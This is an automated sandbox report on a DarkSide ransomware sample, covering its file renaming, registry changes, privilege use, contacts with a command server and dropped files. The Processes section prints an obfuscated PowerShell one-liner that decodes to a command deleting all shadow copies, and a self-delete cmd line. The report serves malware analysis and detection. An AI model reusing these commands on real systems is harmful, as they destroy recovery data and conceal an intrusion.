Malware Analysis Report

2024-10-16 03:29

Sample ID 210726-a9lhlvty7a
Target 17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample
SHA256 17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61
Tags
darkside ransomware spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61

Threat Level: Known bad

The file 17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample was found to be: Known bad.

Malicious Activity Summary

darkside ransomware spyware stealer

DarkSide

Modifies extensions of user files

Reads user/profile data of web browsers

Deletes itself

Sets desktop wallpaper using registry

Suspicious use of NtSetInformationThreadHideFromDebugger

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Modifies Control Panel

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2021-07-26 12:57

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2021-07-26 12:57

Reported

2021-07-26 13:34

Platform

win7v20210410

Max time kernel

47s

Max time network

96s

Command Line

"C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe"

Signatures

DarkSide

ransomware darkside

Modifies extensions of user files

ransomware
Description Indicator Process Target
File renamed C:\Users\Admin\Pictures\RepairProtect.png => C:\Users\Admin\Pictures\RepairProtect.png.341d6443 C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
File opened for modification C:\Users\Admin\Pictures\RepairProtect.png.341d6443 C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
File renamed C:\Users\Admin\Pictures\PushDebug.tif => C:\Users\Admin\Pictures\PushDebug.tif.341d6443 C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
File opened for modification C:\Users\Admin\Pictures\PushDebug.tif.341d6443 C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Reads user/profile data of web browsers

spyware stealer

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\341d6443.BMP" C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\341d6443.BMP" C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A

Enumerates physical storage devices

Modifies Control Panel

evasion
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Control Panel\Desktop\WallpaperStyle = "10" C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.341d6443 C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.341d6443\ = "341d6443" C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\341d6443\DefaultIcon C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\341d6443 C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\341d6443\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\341d6443.ico" C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1212 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1212 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1212 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1212 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1212 wrote to memory of 1364 N/A C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 1212 wrote to memory of 1364 N/A C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 1212 wrote to memory of 1364 N/A C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 1212 wrote to memory of 1364 N/A C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe

"C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C DEL /F /Q C:\Users\Admin\AppData\Local\Temp\17139A~1.EXE >> NUL

Network

Country Destination Domain Proto
N/A 8.8.8.8:53 securebestapp20.com udp
N/A 185.105.109.19:443 securebestapp20.com tcp
N/A 8.8.8.8:53 1.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 7.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 49.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 41.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 70.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 74.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 35.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 3.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 11.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 13.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 64.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 68.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 72.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 17.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 20.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 22.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 26.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 34.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 32.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 48.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 58.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 63.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 2.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 28.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 9.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 15.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 19.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 23.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 36.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 40.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 33.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 46.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 37.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 50.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 39.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 24.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 43.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 30.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 55.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 62.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 57.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 66.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 5.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 44.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 4.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 52.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 56.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 54.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 6.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 60.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 8.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 38.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 10.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 42.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 12.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 16.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 21.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 25.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 27.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 29.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 31.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 45.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 47.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 53.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 14.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 51.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 118.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 116.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 94.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 61.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 114.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 112.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 65.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 78.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 76.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 67.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 80.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 82.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 69.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 84.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 71.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 86.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 88.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 92.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 90.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 96.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 100.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 102.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 73.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 98.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 104.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 75.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 106.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 77.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 108.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 79.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 110.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 81.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 83.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 87.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 89.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 93.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 97.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 85.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 99.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 105.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 109.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 111.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 113.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 115.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 117.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 119.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 101.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 95.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 103.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 91.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 59.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 107.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 126.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 124.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 122.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 121.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 120.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 123.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 128.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 125.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 127.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 204.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 192.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 154.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 146.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 158.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 135.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 159.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 163.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 202.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 198.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 194.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 222.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 180.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 190.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 176.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 166.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 156.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 168.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 136.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 138.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 133.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 137.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 210.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 143.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 208.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 139.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 188.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 151.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 172.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 157.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 186.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 170.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 162.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 148.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 144.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 140.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 248.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 196.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 246.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 141.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 129.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 244.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 145.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 242.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 240.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 147.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 238.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 236.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 234.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 153.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 232.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 155.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 228.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 230.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 161.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 224.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 165.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 226.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 220.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 218.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 167.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 169.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 212.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 171.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 214.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 216.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 206.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 173.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 184.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 182.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 175.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 174.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 177.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 178.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 164.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 160.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 179.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 152.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 181.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 150.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 142.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 183.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 134.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 132.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 185.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 130.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 189.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 191.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 131.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 187.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 252.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 254.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 237.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 235.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 229.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 245.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 195.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 201.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 193.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 209.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 205.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 207.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 213.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 217.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 223.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 227.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 197.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 243.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 199.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 203.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 215.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 221.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 233.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 239.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 219.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 225.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 241.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 211.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 251.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 247.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 250.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 253.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 249.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 231.0.7.10.in-addr.arpa udp
N/A 185.105.109.19:443 securebestapp20.com tcp

Files

memory/1212-59-0x0000000076661000-0x0000000076663000-memory.dmp

memory/1768-60-0x0000000000000000-mapping.dmp

memory/1768-61-0x000007FEFBDC1000-0x000007FEFBDC3000-memory.dmp

memory/1768-62-0x000000001A840000-0x000000001A841000-memory.dmp

memory/1768-63-0x000000001AAA0000-0x000000001AAA1000-memory.dmp

memory/1768-64-0x000000001A8F0000-0x000000001A8F1000-memory.dmp

memory/1768-65-0x000000001AA20000-0x000000001AA22000-memory.dmp

memory/1768-66-0x000000001AA24000-0x000000001AA26000-memory.dmp

memory/1768-67-0x00000000024F0000-0x00000000024F1000-memory.dmp

memory/1768-68-0x000000001C320000-0x000000001C321000-memory.dmp

memory/1768-69-0x000000001C5F0000-0x000000001C5F1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

MD5 6f8088c66ec2be86eeac0108dc183e64
SHA1 ba12519221c27cf86a9f0639994a361a3415d420
SHA256 2c0d42f9db1946c4b3312ef7eda65db8b427dcda9d6e2133921d4a583a30e1c5
SHA512 542a1acb7bad4d1bb48cc3770ecaa39023a973c8077c8935ce18683f5e79f33a1f83309143bf673338882f4d19a9e79ed75056fe5ff78848fad1f763e80ad973

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 f77ba8b50b139afd34a4114516a824b3
SHA1 641f04444f79b2abd711f8dc709220177cad932f
SHA256 e0a9abf09b82cb21e0e98b04b4f41eb314f8c6e4f4cf3c7b1159445534b62c08
